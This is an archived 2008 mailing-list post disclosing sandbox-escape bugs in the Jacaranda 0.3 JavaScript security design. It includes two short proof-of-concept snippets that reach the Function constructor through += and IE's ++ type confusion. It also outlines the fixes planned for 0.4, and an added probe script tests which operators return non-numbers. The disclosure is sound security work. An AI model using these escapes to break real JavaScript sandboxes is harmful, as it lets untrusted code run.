Security bugs in Jacaranda 0.3

David-Sarah Hopwood david.hopwood at industrial-designers.co.uk
Thu Nov 13 20:19:48 PST 2008


Jacaranda 0.3 incorrectly assumes that a += operator returns a number,
when in fact it can return a number or string. Also, the ++ and --
operators are incorrectly implemented on Internet Explorer, and may
not return a number.

This allows the following exploits (in theory, since Jacaranda 0.3
has not been implemented):

  // All ES3 implementations
  (function() {
    var c = 'constructor';
    var F = (function(){})[c += ''];  // Function constructor: c += '' yields the string 'constructor'
    F('alert("toast");')();
  })();

  // Internet Explorer / JScript only
  (function() {
    c = 'constructor';
    var F = (function(){})[c++];      // Function constructor
    F('alert("toast");')();
  })();

In Jacaranda 0.4,
 - '+=' expressions will be treated only as 1st-class, not exposed.
   (The right-hand-side of the += is not restricted.)
 - postincrement/postdecrement will not be treated as exposed, except
   in modules that are marked as depending on ES3.1.


Does anyone know of any remaining cases where:

 - unary operators +, -, ~
 - prefix operators ++ and --
 - postfix operators ++ and --
 - binary operators *, /, %, -, <<, >>, >>>, &, ^, |
 - assignment operators *=, /=, %=, -=, <<=, >>=, >>>=, &=, ^=, |=

do not return a number value (or a decimal value in the case of
ES3.1), either in correctly implemented ES3 / ES3.1 Kona draft, or
due to a bug in any common JavaScript implementation?

-- 
David-Sarah Hopwood
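As an added probe (not part of the original post), the operators listed in the question applied to constructed operand values, reporting any that yield a non-number result. It assumes a modern (ES5+) engine, so the IE/JScript postincrement bug described above does not reproduce; the only operator flagged is the `+=` control the post already identifies.

```javascript
// Added probe (not from the original post): apply the operators the question
// lists to constructed operand values and report any non-number results.
// Assumes a modern (ES5+) engine; the IE/JScript postincrement bug the post
// describes will not reproduce on a correctly implemented engine.

// Constructed operands chosen to exercise the ToNumber / ToPrimitive paths.
var SAMPLES = [
  42, -0, NaN, Infinity, '', '7', 'abc', true, null, undefined, [], [3], {},
  { valueOf: function () { return '9'; } },                 // primitive is a string
  { valueOf: null, toString: function () { return 'x'; } }  // falls back to toString
];

// Each entry takes (a, b); unary forms ignore b. Compound forms operate on the
// parameter a, so the returned value is exactly what the assignment yields.
var OPS = {
  '+a': function (a) { return +a; },   '-a': function (a) { return -a; },
  '~a': function (a) { return ~a; },
  '++a': function (a) { return ++a; }, '--a': function (a) { return --a; },
  'a++': function (a) { return a++; }, 'a--': function (a) { return a--; },
  'a*b': function (a, b) { return a * b; },     'a/b': function (a, b) { return a / b; },
  'a%b': function (a, b) { return a % b; },     'a-b': function (a, b) { return a - b; },
  'a<<b': function (a, b) { return a << b; },   'a>>b': function (a, b) { return a >> b; },
  'a>>>b': function (a, b) { return a >>> b; }, 'a&b': function (a, b) { return a & b; },
  'a^b': function (a, b) { return a ^ b; },     'a|b': function (a, b) { return a | b; },
  'a*=b': function (a, b) { return a *= b; },   'a/=b': function (a, b) { return a /= b; },
  'a%=b': function (a, b) { return a %= b; },   'a-=b': function (a, b) { return a -= b; },
  'a<<=b': function (a, b) { return a <<= b; }, 'a>>=b': function (a, b) { return a >>= b; },
  'a>>>=b': function (a, b) { return a >>>= b; }, 'a&=b': function (a, b) { return a &= b; },
  'a^=b': function (a, b) { return a ^= b; },   'a|=b': function (a, b) { return a |= b; },
  'a+=b': function (a, b) { return a += b; }    // control: the case the post flags
};

// Returns { label: typeofResult } for every operator that produced a
// non-number result on some operand pair; an empty object means all clean.
function findNonNumberResults(ops, samples) {
  var bad = {};
  Object.keys(ops).forEach(function (label) {
    samples.forEach(function (a) {
      samples.forEach(function (b) {
        if (label in bad) return;
        var r;
        try { r = ops[label](a, b); } catch (e) { return; } // ToPrimitive may throw
        if (typeof r !== 'number') bad[label] = typeof r;
      });
    });
  });
  return bad;
}

console.log(findNonNumberResults(OPS, SAMPLES)); // → { 'a+=b': 'string' }
```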
